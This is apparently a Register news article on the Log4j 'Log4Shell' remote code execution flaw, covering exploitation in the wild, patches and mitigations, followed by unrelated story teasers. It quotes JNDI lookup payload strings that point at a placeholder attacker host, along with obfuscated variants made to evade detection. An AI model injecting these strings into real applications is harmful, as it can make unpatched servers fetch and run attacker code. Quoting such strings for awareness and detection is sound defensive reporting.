Log4j RCE latest: In case you hadn't noticed, this is Really Very Bad, exploited in the wild, needs urgent patching

This might be the bug that deserves the website, logo and book deal


Updated Miscreants are wasting no time in using the widespread Log4j vulnerability to compromise systems, with waves and waves of live exploit attempts focused mainly – for now – on turning infected devices into cryptocurrency-mining botnet drones.

Check Point said this morning it was seeing around 100 exploit attempts every minute, going into further detail in a blog post.

Apache Log4j is an open-source logging library written in Java that is used all over the world in many software packages and online systems. Last week it emerged that Alibaba security engineer Chen Zhaojun had found and privately disclosed on November 24 details of a trivial-to-exploit remote code execution hole (CVE-2021-44228) in Log4j 2.x, specifically versions 2.14.1 and earlier.

Exploitation is possible by feeding a specially crafted snippet of text, such as a message or username, to an application that logs this information using Log4j 2. If the text contains a particular sequence of characters, the logging utility will end up fetching Java code from an attacker-controlled server and executing it, allowing the machine to be remotely hijacked and controlled. It is easily wormable, and is present in all manner of things, from Steam and Minecraft to spacecraft and Apple's iCloud.

If you can imagine systems logging site search queries, browser user-agent strings, failed login attempts, and other visitor and customer-supplied stuff, and that this text can be weaponized to achieve code execution in the backend, you can appreciate how attractive this hole is for crooks and fraudsters. The vulnerability has been generally dubbed Log4Shell.

On December 9, in response to Zhaojun's findings, version 2.15 of Log4j was released with the primarily exploitable functionality disabled by default. This should be installed as a priority, or one of the mitigations considered if you can't update right now.

Proof-of-concept code to abuse the insecure logging library also spread across the web. This makes this whole situation dangerous because the code is so prevalent, it is easy to exploit, and there is plenty of working example attack code out there while many systems remain unpatched. The flaw is rated 10 out of 10 in terms of severity.

System admins as well as developers may be tempted to use one of the available proof-of-concept exploits to see if their applications, and their numerous dependencies, use the logging library and are therefore vulnerable to the flaw – and that's not a terrible idea at all. However, bear in mind that it's quite possible those exploiting services out in the wild are also patching Log4j after the initial compromise to keep other miscreants out. Thus, you should consider auditing your code, and installing updates from vendors, as well as look for indicators of compromise and signs that the software has been patched by an intruder.

Useful links

  • A gentle explanation of the Log4j bug by Cygenta
  • A more technical breakdown by ShiftLeft
  • Cybereason released what it called a vaccine that exploits the flaw to disable the bugged functionality in Log4j
  • Here's a curated list of known indicators-of-compromise
  • And a big list of vendors shipping patches because their products include Log4j 2.x. Don't forget: application and server software that include the logging tool need to be distributed to users and installed
  • Cloudflare CEO Matthew Prince said his biz discovered Log4j exploit attempts happening as early as December 1, and Cisco said it saw attempts the next day

For now, the infosec industry is mainly sounding the alarm and telling the world that a Very Bad Thing has come to light – with many taking the opportunity to push their own security defense products, we couldn't help but note. So far, the vuln is seemingly mostly being used to install crypto-mining bots on servers amid scans for at-risk devices, though it's early days yet.

Bitdefender said its honeypot network had seen an increase in scans from "Russia-based IP addresses," which as a bare fact on its own means little; anyone can route their web traffic through a Russia-based node, with some occasionally doing so for fun and profit.

Sophos warned that cryptocoin-mining botnets are one of the more popular post-exploit payloads it's seeing as a result of successful Log4j compromises. The firm said in a blog post that botnets "focus on Linux server platforms, which are particularly exposed to this vulnerability."

"Log4j is a library that is used by many products," said Sophos senior threat researcher Sean Gallagher. "It can therefore be present in the darkest corners of an organization’s infrastructure. For example: any software developed in-house. Finding all systems that are vulnerable to Log4Shell should be a priority for IT security."

Sophos also warned of Log4j-related attempts to steal AWS private keys. For its part, Amazon Web Services' security arm published what it says is a hotpatching utility for Log4j.

Various infosec companies have started live blogs or rapidly updated posts with mitigation information, including Randori (one of the first Western companies to publish detailed information about the remote code execution hole) as well as Trend Micro and others.

Microsoft published its own Log4j exploitation prevention advice, saying it has mostly seen "mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers."

Redmond said: "An example pattern of attack would appear in a web request log with strings like the following:"

${jndi:ldap://[attacker site]/a}

"We’ve seen things like running a lower or upper command within the exploitation string ({jndi:${lower:l}${lower:d}a${lower:p}) and even more complicated obfuscation attempts (${${::-j}${::-n}${::-d}${::-i}) that are all trying to bypass string-matching detections," the Windows giant added.

Like with previous big scary bugs, Log4Shell has a website, a hastily drawn logo, tons of headlines, and probably a three-book publication deal and a movie. Probably. Does it deserve all this excitement? Well, that depends on how fast you patch. ®

Bootnote

F-Secure's CISO Erka Koivunen echoed all the usual warnings, adding: "Please don’t change your Tesla or iPhone name into ${jndi:ldap://url/a} unless you want unexpected user experience."

That would be a terrible thing to do. Really upsetting. So don't do it. No, please, don't.

Updated to add

Version 2.16 of Log4j has been released to fully close the security hole.


Other stories you might like

  • Cheers ransomware hits VMware ESXi systems
    Now we can say extortionware has jumped the shark

    Another ransomware strain is targeting VMware ESXi servers, which have been the focus of extortionists and other miscreants in recent months.

    ESXi, a bare-metal hypervisor used by a broad range of organizations throughout the world, has become the target of such ransomware families as LockBit, Hive, and RansomEXX. The ubiquitous use of the technology, and the size of some companies that use it has made it an efficient way for crooks to infect large numbers of virtualized systems and connected devices and equipment, according to researchers with Trend Micro.

    "ESXi is widely used in enterprise settings for server virtualization," Trend Micro noted in a write-up this week. "It is therefore a popular target for ransomware attacks … Compromising ESXi servers has been a scheme used by some notorious cybercriminal groups because it is a means to swiftly spread the ransomware to many devices."

    Continue reading
  • Twitter founder Dorsey beats hasty retweet from the board
    As shareholders sue the social network amid Elon Musk's takeover scramble

    Twitter has officially entered the post-Dorsey age: its founder and two-time CEO's board term expired Wednesday, marking the first time the social media company hasn't had him around in some capacity.

    Jack Dorsey announced his resignation as Twitter chief exec in November 2021, and passed the baton to Parag Agrawal while remaining on the board. Now that board term has ended, and Dorsey has stepped down as expected. Agrawal has taken Dorsey's board seat; Salesforce co-CEO Bret Taylor has assumed the role of Twitter's board chair. 

    In his resignation announcement, Dorsey – who co-founded and is CEO of Block (formerly Square) – said having founders leading the companies they created can be severely limiting for an organization and can serve as a single point of failure. "I believe it's critical a company can stand on its own, free of its founder's influence or direction," Dorsey said. He didn't respond to a request for further comment today. 

    Continue reading
  • Snowflake stock drops as some top customers cut usage
    You might say its valuation is melting away

    IPO darling Snowflake's share price took a beating in an already bearish market for tech stocks after filing weaker than expected financial guidance amid a slowdown in orders from some of its largest customers.

    For its first quarter of fiscal 2023, ended April 30, Snowflake's revenue grew 85 percent year-on-year to $422.4 million. The company made an operating loss of $188.8 million, albeit down from $205.6 million a year ago.

    Although surpassing revenue expectations, the cloud-based data warehousing business saw its valuation tumble 16 percent in extended trading on Wednesday. Its stock price dived from $133 apiece to $117 in after-hours trading, and today is cruising back at $127. That stumble arrived amid a general tech stock sell-off some observers said was overdue.

    Continue reading
  • Amazon investors nuke proposed ethics overhaul and say yes to $212m CEO pay
    Workplace safety, labor organizing, sustainability and, um, wage 'fairness' all struck down in vote

    Amazon CEO Andy Jassy's first shareholder meeting was a rousing success for Amazon leadership and Jassy's bank account. But for activist investors intent on making Amazon more open and transparent, it was nothing short of a disaster.

    While actual voting results haven't been released yet, Amazon general counsel David Zapolsky told Reuters that stock owners voted down fifteen shareholder resolutions addressing topics including workplace safety, labor organizing, sustainability, and pay fairness. Amazon's board recommended voting no on all of the proposals.

    Jassy and the board scored additional victories in the form of shareholder approval for board appointments, executive compensation and a 20-for-1 stock split. Jassy's executive compensation package, which is tied to Amazon stock price and mostly delivered as stock awards over a multi-year period, was $212 million in 2021. 

    Continue reading
  • Confirmed: Broadcom, VMware agree to $61b merger
    Unless anyone out there can make a better offer. Oh, Elon?

    Broadcom has confirmed it intends to acquire VMware in a deal that looks set to be worth $61 billion, if it goes ahead: the agreement provides for a “go-shop” provision under which the virtualization giant may solicit alternative offers.

    Rumors of the proposed merger emerged earlier this week, amid much speculation, but neither of the companies was prepared to comment on the deal before today, when it was disclosed that the boards of directors of both organizations have unanimously approved the agreement.

    Michael Dell and Silver Lake investors, which own just over half of the outstanding shares in VMware between both, have apparently signed support agreements to vote in favor of the transaction, so long as the VMware board continues to recommend the proposed transaction with chip designer Broadcom.

    Continue reading

Biting the hand that feeds IT © 1998–2022